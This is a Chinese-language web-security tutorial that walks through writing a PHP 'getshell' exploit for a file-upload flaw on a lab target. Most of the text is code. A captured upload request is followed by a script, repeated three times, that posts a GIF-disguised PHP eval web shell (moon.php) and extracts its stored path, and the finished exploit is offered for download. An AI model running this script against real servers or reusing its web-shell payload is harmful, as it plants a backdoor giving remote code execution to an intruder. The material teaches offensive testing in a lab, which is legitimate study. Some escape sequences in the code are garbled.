WEB安全第七章exp编写三 GETSHELL编写
上篇 我教大家编写了一个post注入的exp ,这一节同样也是关于post提交,很多同学都喜欢GETHSELL ,怎么写GETHSLL脚本,
gethshell就是直接得到权限,有直接指向执行命令,或上传一个木马 (getwebshell)。
访问暗月靶机系统 访问上传漏洞测试。
通过测试 上传漏洞测试 是可以直接上传图片木马的。 直接使用burpsuite抓包 。
POST /upload.php HTTP/1.1 Host: target_sys.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:61.0) Gecko/20100101 Firefox/61.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Referer: http://target_sys.com/upload.php Content-Type: multipart/form-data; boundary=---------------------------86531354118821 Content-Length: 23124 Cookie: PHPSESSID=8fj89vrpvaavg5sc92ifg5gu75 Connection: close Upgrade-Insecure-Requests: 1 -----------------------------86531354118821 Content-Disposition: form-data; name="file"; filename="1.jpg" Content-Type: image/jpeg GIF89ad
使用php编写GETSHELL 是使用socket扩展 确保 php.ini 开启 socket.dll
function http_send($host, $packet){ $sock = fsockopen($host, 80); if(!$sock){ print "/n[-] No response from {$host}:80 Trying again..."; $sock = fsockopen($host, 80); } fputs($sock, $packet); while (!feof($sock)) { $resp .= fread($sock, 1024); } fclose($sock); return $resp; }
以上代码是模拟post包发送和获取。
function data($host,$filename){ $payload = "-----------------------------86531354118821/r/n"; $payload .= "Content-Disposition: form-data; name="file"; filename="{$filename}"/r/n"; $payload .= "Content-Type: image/jpeg/r/n/r/n"; $payload .= 'GIF89a'."/r/n".'<?php eval($_POST[a]) ?>'."/r/n"; $payload .= "-----------------------------86531354118821/r/n"; $payload .= "Content-Disposition: form-data; name="sub""; $payload .="/r/n/r/n"; $payload .="12132/r/n"; $payload .="-----------------------------86531354118821--/r/n"; $packet = "POST /upload.php HTTP/1.1/r/n"; $packet .= "Host: {$host}/r/n"; $packet .= "Content-Type: multipart/form-data; boundary=---------------------------86531354118821/r/n"; $packet .= "Content-Length: ".strlen($payload)."/r/n"; $packet .= "Connection: close/r/n/r/n"; $packet .= $payload; return $packet; }
模拟POST包提交,这里跟抓来的包处理后 是相同。
---------------------------86531354118821-- 这个部分是提交匹配的代码。
$payload .= 'GIF89a'."/r/n".'<?php eval($_POST[a]) ?>'."/r/n";
这部分是你要上传的图片木马内容
- $filename = "moon.php";
- $host = "target_sys.com";
- print http_send($host,data($host,$filename));
$filename 这个是上传的文件名,$host 这个部分是域名。
以下是getshell的代码。保存为exp2.php
<?php function http_send($host, $packet){ $sock = fsockopen($host, 80); if(!$sock){ print "/n[-] No response from {$host}:80 Trying again..."; $sock = fsockopen($host, 80); } fputs($sock, $packet); while (!feof($sock)) { $resp .= fread($sock, 1024); } fclose($sock); return $resp; } function data($host,$filename){ $payload = "-----------------------------86531354118821/r/n"; $payload .= "Content-Disposition: form-data; name="file"; filename="{$filename}"/r/n"; $payload .= "Content-Type: image/jpeg/r/n/r/n"; $payload .= 'GIF89a'."/r/n".'<?php eval($_POST[a]) ?>'."/r/n"; $payload .= "-----------------------------86531354118821/r/n"; $payload .= "Content-Disposition: form-data; name="sub""; $payload .="/r/n/r/n"; $payload .="12132/r/n"; $payload .="-----------------------------86531354118821--/r/n"; $packet = "POST /upload.php HTTP/1.1/r/n"; $packet .= "Host: {$host}/r/n"; $packet .= "Content-Type: multipart/form-data; boundary=---------------------------86531354118821/r/n"; $packet .= "Content-Length: ".strlen($payload)."/r/n"; $packet .= "Connection: close/r/n/r/n"; $packet .= $payload; return $packet; } $filename = "moon.php"; $host = "target_sys.com"; print http_send($host,data($host,$filename));
执行脚本如图
终端下返回信息,有很多内容 并不是想要的,所以要进行WEBSHELL的路径进行截取。返回所需的内容。完整的exp如下
<?php function http_send($host, $packet){ $sock = fsockopen($host, 80); if(!$sock){ print "/n[-] No response from {$host}:80 Trying again..."; $sock = fsockopen($host, 80); } fputs($sock, $packet); while (!feof($sock)) { $resp .= fread($sock, 1024); } fclose($sock); return $resp; } function data($host,$filename){ $payload = "-----------------------------86531354118821/r/n"; $payload .= "Content-Disposition: form-data; name="file"; filename="{$filename}"/r/n"; $payload .= "Content-Type: image/jpeg/r/n/r/n"; $payload .= 'GIF89a'."/r/n".'<?php eval($_POST[a]) ?>'."/r/n"; $payload .= "-----------------------------86531354118821/r/n"; $payload .= "Content-Disposition: form-data; name="sub""; $payload .="/r/n/r/n"; $payload .="12132/r/n"; $payload .="-----------------------------86531354118821--/r/n"; $packet = "POST /upload.php HTTP/1.1/r/n"; $packet .= "Host: {$host}/r/n"; $packet .= "Content-Type: multipart/form-data; boundary=---------------------------86531354118821/r/n"; $packet .= "Content-Length: ".strlen($payload)."/r/n"; $packet .= "Connection: close/r/n/r/n"; $packet .= $payload; return $packet; } $filename = "moon.php"; $host = "target_sys.com"; $html_str =http_send($host,data($host,$filename)); preg_match("/Stored in: (.*?)</", $html_str,$m); if ($m[1]){ echo "http://".$host."/".$m[1]; }else{ echo "flase"; }
exp下载 exp2.rar
执行脚本
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论